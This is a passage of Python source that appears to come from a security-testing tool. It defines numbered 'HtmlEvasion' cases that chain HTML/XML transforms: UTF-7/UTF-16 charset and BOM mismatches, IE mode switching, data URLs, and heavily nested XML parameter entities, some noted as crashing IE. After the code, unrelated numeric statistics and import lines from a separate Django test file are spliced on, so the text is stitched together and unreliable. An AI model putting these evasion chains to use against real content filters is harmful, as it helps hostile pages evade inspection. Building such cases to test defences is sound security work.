evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix))
cases.append(TransformFunction("HtmlEvasion-html-224", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2)
))
cases.append(TransformFunction("HtmlEvasion-html-225", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2),
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
number_of_nested=39730)
))
cases.append(TransformFunction("HtmlEvasion-html-226", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2),
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
number_of_nested=39730),
evasions.html.entity_encoding_internal_parameter_entity_declaration_mix
))
##### End xml based evasions
##### Encoding based minimal cases
# declaring (header or BOM) as utf8/utf7 and sending as utf16le/utf16be -> infinite loop? (except when utf8 BOM + utf16le encoding)
cases.append(TransformFunction("HtmlEvasion-html-300", None, evasions.html.no_declared_encoding_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-301", None, evasions.html.no_declared_encoding_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-302", None, evasions.html.http_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-303", None, evasions.html.http_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-304", None, evasions.html.http_declared_utf_16_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-305", None, evasions.html.http_declared_utf_16le_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-306", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_0))
cases.append(TransformFunction("HtmlEvasion-html-307", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_1))
cases.append(TransformFunction("HtmlEvasion-html-308", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_2))
cases.append(TransformFunction("HtmlEvasion-html-309", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-310", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_4))
cases.append(TransformFunction("HtmlEvasion-html-311", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_5))
cases.append(TransformFunction("HtmlEvasion-html-312", None, evasions.html.http_declared_utf_7_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-313", None, evasions.html.bom_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-314", None, evasions.html.bom_declared_utf_8_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-315", None, evasions.html.bom_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-316", None, evasions.html.bom_declared_utf_16le_encoded_as_utf_16_le))
# all BOM utf7 [1,5] + encode utf_7 [0, 5i] all work, but only doing a subset so reduce number of cases
cases.append(TransformFunction("HtmlEvasion-html-317", None, evasions.html.bom_declared_utf_7_variant_1_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-318", None, evasions.html.bom_declared_utf_7_variant_2_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-319", None, evasions.html.bom_declared_utf_7_variant_3_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-320", None, evasions.html.bom_declared_utf_7_variant_4_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-321", None, evasions.html.bom_declared_utf_7_variant_5_encoded_as_utf_7_3))
cases.append(TransformFunction("HtmlEvasion-html-322", None, evasions.html.bom_declared_utf_7_variant_1_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-323", None, evasions.html.bom_declared_utf_7_variant_2_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-324", None, evasions.html.bom_declared_utf_7_variant_3_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-325", None, evasions.html.bom_declared_utf_7_variant_4_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-326", None, evasions.html.bom_declared_utf_7_variant_5_encoded_as_utf_7_5_i))
# # IE mode <= 9: BOM has precedence over HTTP declaration (except when BOM = UTF-7 apparently, weird stuff happens)
base = TransformFunction("", None, evasions.html.xua_meta_change_value_8, evasions.html.xua_move_meta_to_headers)
cases.append(TransformFunction("HtmlEvasion-html-327", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-328", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-329", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-330", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_8_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-331", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_8_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-332", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_8_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-333", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-334", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-335", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-336", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_16be_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-337", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_16le_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-338", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_16le_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-339", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_16le_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-340", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_1_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-341", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_1_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-342", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_1_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-343", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_7_variant_1_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-344", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_7_variant_1_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-345", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_7_variant_1_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-346", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_5_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-347", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_5_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-348", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_5_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-349", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_7_variant_5_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-350", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_7_variant_5_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-351", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_7_variant_5_encoded_as_utf_16_be))
# IE mode > 9: HTTP declaration has precedence over BOM
base = TransformFunction("", None, evasions.html.xua_meta_change_value_10, evasions.html.xua_move_meta_to_headers)
cases.append(TransformFunction("HtmlEvasion-html-360", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_16le_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-361", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_16be_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-362", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_1_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-363", None, base, evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_5_encoded_as_utf_8))
cases.append(TransformFunction("HtmlEvasion-html-364", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_16be_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-365", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_8_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-366", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_7_variant_1_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-367", None, base, evasions.html.http_declared_utf_16_bom_declared_utf_7_variant_5_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-368", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_16be_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-369", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_8_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-370", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_7_variant_1_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-371", None, base, evasions.html.http_declared_utf_16le_bom_declared_utf_7_variant_5_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-372", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_16le_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-373", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_8_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-374", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_7_variant_1_encoded_as_utf_16_be))
cases.append(TransformFunction("HtmlEvasion-html-375", None, base, evasions.html.http_declared_utf_16be_bom_declared_utf_7_variant_5_encoded_as_utf_16_le))
cases.append(TransformFunction("HtmlEvasion-html-376", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_16le_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-377", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_16be_encoded_as_utf_7_5_i))
cases.append(TransformFunction("HtmlEvasion-html-378", None, base, evasions.html.http_declared_utf_7_bom_declared_utf_8_encoded_as_utf_7_5_i))
##### End Encoding based minimal cases
simple_index = len(cases)
################### All combos
################## IE = 8 combo path
base = evasions.html.remove_html_comments
cases.append(TransformFunction("HtmlEvasion-html-500", None, base, evasions.html.remove_content_type_http_equiv_meta))
cases.append(TransformFunction("HtmlEvasion-html-501", None, cases[-1], evasions.html.xua_meta_change_value_8))
cases.append(TransformFunction("HtmlEvasion-html-502", None, cases[-1], evasions.html.xua_move_meta_to_headers))
cases.append(TransformFunction("HtmlEvasion-html-503", None, cases[-1], evasions.html.script_language_add_encode))
cases.append(TransformFunction("HtmlEvasion-html-504", None, cases[-1], evasions.html.encoded_script))
base = cases[-1]
# path1
cases.append(TransformFunction("HtmlEvasion-html-505", None, cases[-1], evasions.html.external_resource_internal_script))
cases.append(TransformFunction("HtmlEvasion-html-506", None, cases[-1], evasions.html.attributes_reverse))
cases.append(TransformFunction("HtmlEvasion-html-507", None, cases[-1], evasions.html.meta_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-508", None, cases[-1], evasions.html.convert_to_xhtml_http_declared_no_type_inferred_html))
cases.append(TransformFunction("HtmlEvasion-html-509", None, cases[-1], evasions.html.attributes_insert_many_newlines.parameterize(multiplier=30)))
cases.append(TransformFunction("HtmlEvasion-html-510", None, cases[-1], evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-511", None, cases[-1], evasions.html.insert_many_slash_after_opening_tag_names.parameterize(N=783)))
cases.append(TransformFunction("HtmlEvasion-html-512", None, cases[-1], evasions.html.http_declared_utf_7_bom_declared_utf_16be_encoded_as_utf_16_be))
# path2
cases.append(TransformFunction("HtmlEvasion-html-513", None, base, evasions.html.attributes_reverse))
cases.append(TransformFunction("HtmlEvasion-html-514", None, cases[-1], evasions.html.meta_declared_text_xml))
cases.append(TransformFunction("HtmlEvasion-html-515", None, cases[-1], evasions.html.attributes_insert_many_newlines.parameterize(multiplier=30)))
cases.append(TransformFunction("HtmlEvasion-html-516", None, cases[-1], evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-517", None, cases[-1], evasions.html.move_body_to_nested_div))
cases.append(TransformFunction("HtmlEvasion-html-518", None, cases[-1], evasions.html.http_declared_utf_8_bom_declared_utf_7_variant_5_encoded_as_utf_16_le))
##################
################### IE = 9 combo path
# data url path
base = TransformFunction("", None, evasions.html.remove_html_comments, evasions.html.remove_content_type_http_equiv_meta)
cases.append(TransformFunction("HtmlEvasion-html-600", None, base, evasions.html.xua_meta_change_value_9))
cases.append(TransformFunction("HtmlEvasion-html-601", None, base, evasions.html.xua_move_meta_to_headers))
cases.append(TransformFunction("HtmlEvasion-html-602", None, cases[-1], evasions.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_url))
cases.append(TransformFunction("HtmlEvasion-html-603", None, cases[-1], evasions.html.attributes_reverse))
cases.append(TransformFunction("HtmlEvasion-html-604", None, cases[-1], evasions.html.meta_declared_text_html))
cases.append(TransformFunction("HtmlEvasion-html-605", None, cases[-1], evasions.html.convert_to_xhtml_http_declared_image_svg_xml))
parsed_as_xml_case = cases[-1]
# XML case path
cases.append(TransformFunction("HtmlEvasion-html-606", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_dec))
cases.append(TransformFunction("HtmlEvasion-html-607", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_hex))
cases.append(TransformFunction("HtmlEvasion-html-608", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-609", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-610", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities))
# cases.append(TransformFunction("HtmlEvasion-html-611", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_dec))
# cases.append(TransformFunction("HtmlEvasion-html-612", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_hex))
# cases.append(TransformFunction("HtmlEvasion-html-613", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_mix))
# cases.append(TransformFunction("HtmlEvasion-html-614", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_cdata))
# cases.append(TransformFunction("HtmlEvasion-html-615", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-616", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities))
# cases.append(TransformFunction("HtmlEvasion-html-617", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_mix,
# evasions.html.entity_encoding_cdata_mix))
# cases.append(TransformFunction("HtmlEvasion-html-618", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_internal_entities,
# evasions.html.entity_encoding_cdata_internal_entities))
cases.append(TransformFunction("HtmlEvasion-html-619", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-620", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-621", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-622", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entity,
# evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-623", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-624", None, parsed_as_xml_case, evasions.html.entity_encoding_attributes_internal_entities, evasions.html.entity_encoding_cdata_internal_entities, evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity)) # crashes IE
cases.append(TransformFunction("HtmlEvasion-html-625", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-626", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity,
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities))
cases.append(TransformFunction("HtmlEvasion-html-627", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_root_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-628", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_root_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-629", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_internal_entities,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-630", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix))
cases.append(TransformFunction("HtmlEvasion-html-631", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2)
))
cases.append(TransformFunction("HtmlEvasion-html-632", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2),
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
number_of_nested=39730)
))
# data url + ... + entity_encoding_internal_parameter_entity_declaration_mix -> too large value ?
# cases.append(TransformFunction("HtmlEvasion-html-633", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_internal_entities,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_root_internal_entity,
# evasions.html.entity_encoding_internal_entity_declaration_mix,
# evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
# min_value_length=2),
# evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
# number_of_nested=99730),
# evasions.html.entity_encoding_internal_parameter_entity_declaration_mix
# ))
cases.append(TransformFunction("HtmlEvasion-html-634", None, cases[-1], evasions.html.http_declared_utf_16be_bom_declared_utf_8_encoded_as_utf_8))
###################
################## IE = 10 combo path
base = TransformFunction("", None, evasions.html.remove_html_comments, evasions.html.remove_content_type_http_equiv_meta)
cases.append(TransformFunction("HtmlEvasion-html-700", None, base, evasions.html.xua_meta_change_value_10))
cases.append(TransformFunction("HtmlEvasion-html-701", None, base, evasions.html.xua_move_meta_to_headers))
cases.append(TransformFunction("HtmlEvasion-html-702", None, cases[-1], evasions.html.external_resource_internal_script))
cases.append(TransformFunction("HtmlEvasion-html-703", None, cases[-1], evasions.html.meta_declared_text_html))
cases.append(TransformFunction("HtmlEvasion-html-704", None, cases[-1], evasions.html.attributes_reverse))
base = cases[-1]
# path 1 (html)
cases.append(TransformFunction("HtmlEvasion-html-705", None, cases[-1], evasions.html.attributes_insert_many_newlines.parameterize(multiplier=30)))
cases.append(TransformFunction("HtmlEvasion-html-706", None, cases[-1], evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-707", None, cases[-1], evasions.html.move_body_to_nested_div_with_children.parameterize(N=1041, M=1000000)))
cases.append(TransformFunction("HtmlEvasion-html-708", None, cases[-1], evasions.html.http_declared_utf_7_bom_declared_utf_16be_encoded_as_utf_7_5_i))
# path 2 (xml)
cases.append(TransformFunction("HtmlEvasion-html-709", None, base, evasions.html.convert_to_xhtml_http_declared_application_xhtml_xml))
parsed_as_xml_case = cases[-1]
cases.append(TransformFunction("HtmlEvasion-html-710", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_dec))
cases.append(TransformFunction("HtmlEvasion-html-711", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_hex))
cases.append(TransformFunction("HtmlEvasion-html-712", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_mix))
cases.append(TransformFunction("HtmlEvasion-html-713", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-714", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities))
# cases.append(TransformFunction("HtmlEvasion-html-715", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_dec))
# cases.append(TransformFunction("HtmlEvasion-html-716", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_hex))
# cases.append(TransformFunction("HtmlEvasion-html-717", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_mix))
# cases.append(TransformFunction("HtmlEvasion-html-718", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_cdata))
# cases.append(TransformFunction("HtmlEvasion-html-719", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-720", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities))
# cases.append(TransformFunction("HtmlEvasion-html-721", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_mix,
# evasions.html.entity_encoding_cdata_mix))
# cases.append(TransformFunction("HtmlEvasion-html-722", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_internal_entities,
# evasions.html.entity_encoding_cdata_internal_entities))
cases.append(TransformFunction("HtmlEvasion-html-723", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-724", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-725", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-726", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entity,
# evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-727", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
# cases.append(TransformFunction("HtmlEvasion-html-728", None, parsed_as_xml_case, evasions.html.entity_encoding_attributes_internal_entities, evasions.html.entity_encoding_cdata_internal_entities, evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity)) # crashes IE
cases.append(TransformFunction("HtmlEvasion-html-729", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity))
cases.append(TransformFunction("HtmlEvasion-html-730", None, parsed_as_xml_case,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity,
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities))
cases.append(TransformFunction("HtmlEvasion-html-731", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_root_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-732", None, parsed_as_xml_case,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_root_internal_entity))
# cases.append(TransformFunction("HtmlEvasion-html-733", None, parsed_as_xml_case,
# evasions.html.entity_encoding_attributes_internal_entities,
# evasions.html.entity_encoding_cdata_internal_entities,
# evasions.html.entity_encoding_root_internal_entity))
cases.append(TransformFunction("HtmlEvasion-html-734", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix))
cases.append(TransformFunction("HtmlEvasion-html-735", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2)
))
cases.append(TransformFunction("HtmlEvasion-html-736", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2),
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
number_of_nested=1730)
))
# data url + ... + entity_encoding_internal_parameter_entity_declaration_mix -> too large value ?
cases.append(TransformFunction("HtmlEvasion-html-737", None, parsed_as_xml_case,
evasions.html.entity_encoding_attributes_internal_entities,
evasions.html.entity_encoding_cdata_internal_entities,
evasions.html.entity_encoding_root_internal_entity,
evasions.html.entity_encoding_internal_entity_declaration_mix,
evasions.html.entity_encoding_internal_entity_declaration_internal_parameter_entity.parameterize(
min_value_length=2),
evasions.html.entity_encoding_internal_parameter_entity_declaration_nested_internal_parameter_entities.parameterize(
number_of_nested=1730),
evasions.html.entity_encoding_internal_parameter_entity_declaration_mix
))
cases.append(TransformFunction("HtmlEvasion-html-738", None, cases[-1], evasions.html.http_declared_utf_7_encoded_as_utf_7_5_i))
# description cleanup
if not long_descriptions:
TransformFunction.cleanup_descriptions(cases, simple_index)
return OrderedDict([(c.name, c) for c in cases])
| 100.307832
| 300
| 0.740453
| 6,522
| 55,069
| 5.800981
| 0.067464
| 0.136702
| 0.190199
| 0.26492
| 0.95097
| 0.924697
| 0.907543
| 0.90424
| 0.899561
| 0.885209
| 0
| 0.028404
| 0.176578
| 55,069
| 548
| 301
| 100.490876
| 0.805954
| 0.146816
| 0
| 0.369347
| 0
| 0
| 0.097968
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002513
| false
| 0
| 0.007538
| 0
| 0.012563
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
07e1e86e2ff4a5866e3c70fac945f410b524054f
| 20,626
|
py
|
Python
|
geotrek/core/tests/test_path_merge.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 50
|
2016-10-19T23:01:21.000Z
|
2022-03-28T08:28:34.000Z
|
geotrek/core/tests/test_path_merge.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 1,422
|
2016-10-27T10:39:40.000Z
|
2022-03-31T13:37:10.000Z
|
geotrek/core/tests/test_path_merge.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 46
|
2016-10-27T10:59:10.000Z
|
2022-03-22T15:55:56.000Z
|
from unittest import skipIf
from django.conf import settings
from django.contrib.gis.geos import LineString, Point
from django.test import TestCase
from django.urls import reverse
from mapentity.factories import SuperUserFactory
